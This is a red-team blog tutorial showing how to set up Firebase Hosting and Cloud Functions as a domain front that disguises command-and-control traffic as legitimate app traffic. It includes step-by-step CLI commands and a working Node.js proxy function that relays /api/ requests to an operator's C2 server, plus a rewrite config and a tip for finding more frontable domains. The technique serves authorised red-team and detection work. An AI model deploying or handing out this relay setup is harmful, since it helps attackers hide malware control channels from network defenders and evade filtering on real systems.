# Firebase Domain Front - Hiding C2 as App traffic We often see that large organization use firebase for hosting their applications and database. Firebase has a lot of features such as real-time database, hosting, cloud functions, hosting etc. Today we are going to talk about firebase hosting and cloud functions which are used by a lot of mobile applications these days. In our recent project, we were able to hide ourselves as a legit mobile traffic and bypass a lot of traffic filters ## Firebase Cloud Functions ![Firebase Cloud Functions](https://2978447173-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MDtkWzdvgRTZWDjfsGa%2F-MSc7YxkKELoq70ZkUP3%2F-MScA4drWg-ISb1WQSZZ%2Fimage.png?alt=media\&token=26dc9cac-94f1-4ab0-b99f-e59011c44643) Firebase allows an operator to write an applications in Node JS and deploy it using its hosting feature. ## Setting up Firebase Domain Front So lets start by selecting a app hosted using firebase. In the following case we'll take / as our selected app. #### Step 1: Create an account on #### Step 2: Go to Console ![Go to Console in Top Right Corner](https://2978447173-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MDtkWzdvgRTZWDjfsGa%2F-MSc7YxkKELoq70ZkUP3%2F-MScBBm9GJPklTku60fi%2Fimage.png?alt=media\&token=e14e1c12-0ef7-4a50-8979-ece8899d1ba8) #### Step 3: Create a project and give it a name ![Create Firebase Project](https://2978447173-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MDtkWzdvgRTZWDjfsGa%2F-MSc7YxkKELoq70ZkUP3%2F-MScEuDeLMYIR7Zwa0PU%2Fimage.png?alt=media\&token=1a778615-a853-4ae4-88ae-862f0ff83cde) ![Set up a project name](https://2978447173-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MDtkWzdvgRTZWDjfsGa%2F-MSc7YxkKELoq70ZkUP3%2F-MScFUaFdxg4rtzlt9T5%2Fimage.png?alt=media\&token=2b824b4c-0e78-455a-a1a6-1d9d0929fd77) ![Create a Project](https://2978447173-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MDtkWzdvgRTZWDjfsGa%2F-MSc7YxkKELoq70ZkUP3%2F-MScFrIT8vH02s51IZMO%2Fimage.png?alt=media\&token=0550baaf-493f-4876-ac71-e86c3a0b410d) #### Step 4: Open your command prompt and install firebase cli. ``` npm install -g firebase-tools ``` #### Step 5: Make a folder and perform firebase cli login. ``` mkdir awesomedomainfront cd awesomedomainfront firebase login ``` #### Step 6: Initiate Hosting ``` firebase init hosting ``` Once you hit the above command you'll be presented with many options. See the following screenshot for responses to the options ![Firebase Hosting Init](https://2978447173-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MDtkWzdvgRTZWDjfsGa%2F-MSc7YxkKELoq70ZkUP3%2F-MScIFw0ZD-qVYDLfKIs%2Fimage.png?alt=media\&token=3cca31f3-ee1e-4954-9c6b-18a0cfe5ac0b) #### Step 7: Initiate Cloud functions ``` firebase init functions ``` Again you'll be presented with many options. See the following screenshot for the response to the options ![Firebase Functions init](https://2978447173-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MDtkWzdvgRTZWDjfsGa%2F-MSc7YxkKELoq70ZkUP3%2F-MScIuz8yvM6shNp1aAT%2Fimage.png?alt=media\&token=ccd31da5-2ab2-406a-a78d-7de53ba731c8) #### Step 8: Install Express and http-proxy ``` cd functions npm i express --save npm i http-proxy --save ``` ![Install Express and http-proxy](https://2978447173-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MDtkWzdvgRTZWDjfsGa%2F-MSc7YxkKELoq70ZkUP3%2F-MScJvDDwUoody6vz4B2%2Fimage.png?alt=media\&token=cf8e68f4-f974-4c23-9f89-e13bb7df1d42) #### Step 9: Edit the index.js Since you are already in the functions folder after saving the npm packages. Lets edit the index.js file in this folder. {% code title="index.js" %} ```javascript const functions = require('firebase-functions'); const express = require('express'); const app = express(); var http = require('http'), httpProxy = require('http-proxy'); var proxy = httpProxy.createProxyServer({secure:false,xfwd:true}); //Setting up X-forwarded for header // your C2 must have a URI . In this case I am using /api/" app.all('/api/*', function(req, res, next){ console.log(req.url); req.url = "/api/" + req.url.slice(5); console.log("Req URL:"+req.url); proxy.web(req, res, { target: 'https://firebase.redteam.cafe:443/' /* Change it to your domain */ }, function(e) { console.log(e); }); res.set('Cache-Control', 'no-cache, no-store'); }); exports.app = functions.https.onRequest(app); // // Create and Deploy Your First Cloud Functions // // https://firebase.google.com/docs/functions/write-firebase-functions // // exports.helloWorld = functions.https.onRequest((request, response) => { // functions.logger.info("Hello logs!", {structuredData: true}); // response.send("Hello from Firebase!"); // }); ``` {% endcode %} #### Step 10: Edit the firebase.json file Go to the parent folder and edit firebase.json ```javascript cd ../ ``` {% code title="firebase.json" %} ```javascript { "hosting": { "headers" : [{ "source" : "**/*.@(js)", "headers": [{ "key" : "Cache-Control", "value" : "no-cache, no-store" }] }], "public": "public", "rewrites": [{ /* your C2 must have a URI . In this case I am using /api/" */ "source": "/api/**", "function": "app", "run":{ "region" : "asia-east2" } }], "ignore": [ "firebase.json", "**/.*", "**/node_modules/**" ] }, "functions": { } } ``` {% endcode %} #### Step 11: Deploy the project Lets start the deployment of our firebase project ```javascript firebase deploy ``` ![Error Message for deploying the project](https://2978447173-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MDtkWzdvgRTZWDjfsGa%2F-MSc7YxkKELoq70ZkUP3%2F-MScXKCtY79puvslwWp5%2Fimage.png?alt=media\&token=62bf7bdb-fbc5-4d5c-9527-9c472490bc58) Modify the plan of project from free plan to Pay as you go plan ![Click Modify Plan](https://2978447173-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MDtkWzdvgRTZWDjfsGa%2F-MSc7YxkKELoq70ZkUP3%2F-MScYK2ZpMO3S_C0qsaA%2Fimage.png?alt=media\&token=de5fc0fa-8fb6-4929-823d-f9a65fc3eb96) ![Select "Pay as you go" plan](https://2978447173-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MDtkWzdvgRTZWDjfsGa%2F-MSc7YxkKELoq70ZkUP3%2F-MScZ6AhirqLtYGSfsdP%2Fimage.png?alt=media\&token=c5d910ce-2156-445d-8620-479a3168fedb) Now lets try the deployment again. ```javascript firebase deploy ``` ![Deploy Complete](https://2978447173-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MDtkWzdvgRTZWDjfsGa%2F-MSc7YxkKELoq70ZkUP3%2F-MSc_wPTPpQRpdmr-aDO%2Fimage.png?alt=media\&token=619eb21f-ecd6-45e9-8788-aa0d2574804b) #### Final Tests for the Domain Front Lets check what's hosted on ![Response from firebase.redteam.cafe](https://2978447173-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MDtkWzdvgRTZWDjfsGa%2F-MSc7YxkKELoq70ZkUP3%2F-MScWdB94gt3hhO5wHmV%2Fimage.png?alt=media\&token=487e79c6-0dcf-4ddb-9741-b03e8447f68f) Let's check if our app works fine ![Response from amazingdomainfront.web.app](https://2978447173-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MDtkWzdvgRTZWDjfsGa%2F-MScbLEnqhn3KtDhNxC6%2F-MScnEEo-xFqTHKO6JCJ%2Fimage.png?alt=media\&token=406d4287-8d2e-4063-82f8-f751ef5d2e0e) ### THE FINAL TEST Lets see if we are able to do **Domain Front against a test domain** / ![Domain front with Test Domain is Successful](https://2978447173-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MDtkWzdvgRTZWDjfsGa%2F-MScbLEnqhn3KtDhNxC6%2F-MScphoKab_PHORnOA12%2Fimage.png?alt=media\&token=db8ba2c3-c403-4a4b-989e-fc7dcb6f774f) #### How to Find more domain fronts Hint: Try to find domains whose CNAME ends with \*.web.app **UPDATE (4/5/2021) : Vincent Yiu created a list for domain fronts in the following github repo** ## Download Source Code Source code can be downloaded from my github repository ## Credits [Vincent Yiu](https://twitter.com/vysecurity), [Jonathan Cheung](https://www.linkedin.com/in/jonathan-cheung-0a8208138/) ### Connect with me Twitter: